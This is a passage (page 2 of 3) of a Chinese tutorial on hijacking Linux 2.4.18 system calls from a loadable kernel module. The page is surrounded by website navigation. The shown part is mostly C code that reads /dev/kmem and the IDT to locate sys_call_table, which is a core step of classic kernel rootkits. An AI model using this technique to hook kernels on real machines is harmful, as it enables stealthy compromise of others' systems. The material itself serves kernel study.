转至繁体中文版     | 网站首页 | 图文教程 | 资源下载 | 站长博客 | 图片素材 | 武汉seo | 武汉网站优化 | 
最新公告:     敏韬网|教学资源学习资料永久免费分享站!  [mintao  2008年9月2日]        
您现在的位置: 学习笔记 >> 图文教程 >> 数据库 >> MySql >> 正文
Linux2.4.18内核下基于LKM的系统调用劫持         ★★★★

Linux2.4.18内核下基于LKM的系统调用劫持

作者:闵涛 文章来源:闵涛的学习笔记 点击数:1773 更新时间:2009/4/22 20:45:50
...)来做到。但要小心,访问完系统调用的参数后,一定要恢复FS。下面是一段例子:

filename内核空间;比如说我们刚创建了一个字串

unsigned long old_fs_value=get_fs();

set_fs(get_ds);               /*完成之后就可以存取用户空间了*/

open(filename, O_CREAT|O_RDWR|O_EXCL, 0640);

set_fs(old_fs_value);         /*恢复 fs ...*/

三.在module里实现sys_call_table地址查找的代码实现

主要代码如下:

/*实现系统调用*/

unsigned long errno;

#define __syscall_return(type, res) \

do { \

      if ((unsigned long)(res) >= (unsigned long)(-125)) { \

           errno = -(res); \

           res = -1; \

      } \

      return (type) (res); \

} while (0)

#define _syscall1(type,name,type1,arg1) \

type name(type1 arg1) \

{ \

long __res; \

__asm__ volatile ("int $0x80" \

      : "=a" (__res) \

      : "0" (__NR_##name),"b" ((long)(arg1))); \

__syscall_return(type,__res); \

}

#define _syscall3(type,name,type1,arg1,type2,arg2,type3,arg3) \

type name(type1 arg1,type2 arg2,type3 arg3) \

{ \

long __res; \

__asm__ volatile ("int $0x80" \

      : "=a" (__res) \

      : "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \

             "d" ((long)(arg3))); \

__syscall_return(type,__res); \

}

static inline _syscall3(int,write,int,fd,const char *,buf,off_t,count)

static inline _syscall3(int,read,int,fd,char *,buf,off_t,count)

static inline _syscall3(off_t,lseek,int,fd,off_t,offset,int,count)

static inline _syscall3(int,open,const char *,file,int,flag,int,mode)

static inline _syscall1(int,close,int,fd)

/*从这里以后就可以使用这几个系统调用了*/

 

struct {

        unsigned short limit;

        unsigned int base;

} __attribute__ ((packed)) idtr;

struct {

        unsigned short off1;

        unsigned short sel;

        unsigned char none,flags;

        unsigned short off2;

} __attribute__ ((packed)) idt;

int kmem;

void readkmem (void *m,unsigned off,int sz)

{

      mm_segment_t old_fs_value=get_fs();

        set_fs(get_ds());    

        if (lseek(kmem,off,0)!=off) {

                printk("kmem lseek error in read\n"); return;

        }

        if (read(kmem,m,sz)!=sz) {

                printk("kmem read error!\n"); return;

        }

      set_fs(old_fs_value);

}

#define CALLOFF 100 /* 我们将读出int $0x80的头100个字节 */

/*得到sys_call_table的地址*/

unsigned getscTable()

{

        unsigned sct;

        unsigned sys_call_off;

        char sc_asm[CALLOFF],*p;

/* 获得IDTR寄存器的值 */

        asm ("sidt %0" : "=m" (idtr));

         mm_segment_t old_fs_value=get_fs();

          const char *filename="/dev/kmem";

上一页  [1] [2] [3]  下一页


没有相关教程
教程录入:mintao    责任编辑:mintao 
  • 上一篇教程:

  • 下一篇教程:
    • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
      注:本站部分文章源于互联网,版权归原作者所有!如有侵权,请原作者与本站联系,本站将立即删除! 本站文章除特别注明外均可转载,但需注明出处! [MinTao学以致用网]
      网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
    同类栏目
    · Sql Server  · MySql
    · Access  · ORACLE
    · SyBase  · 其他
    更多内容
    热门推荐 更多内容
  • 没有教程
    		•
    赞助链接
    更多内容
    闵涛博文 更多关于武汉SEO的内容
    500 - 内部服务器错误。

    500 - 内部服务器错误。

    您查找的资源存在问题,因而无法显示。
    | 设为首页 |加入收藏 | 联系站长 | 友情链接 | 版权申明 | 广告服务
    MinTao学以致用网

    Copyright @ 2007-2012 敏韬网(敏而好学,文韬武略--MinTao.Net)(学习笔记) Inc All Rights Reserved.
    闵涛 投放广告、内容合作请Q我! E_mail:admin@mintao.net(欢迎提供学习资源)

    站长:MinTao ICP备案号:鄂ICP备11006601号-18

    闵涛站盟:医药大全-武穴网A打造BCD……
    		咸宁网络警察报警平台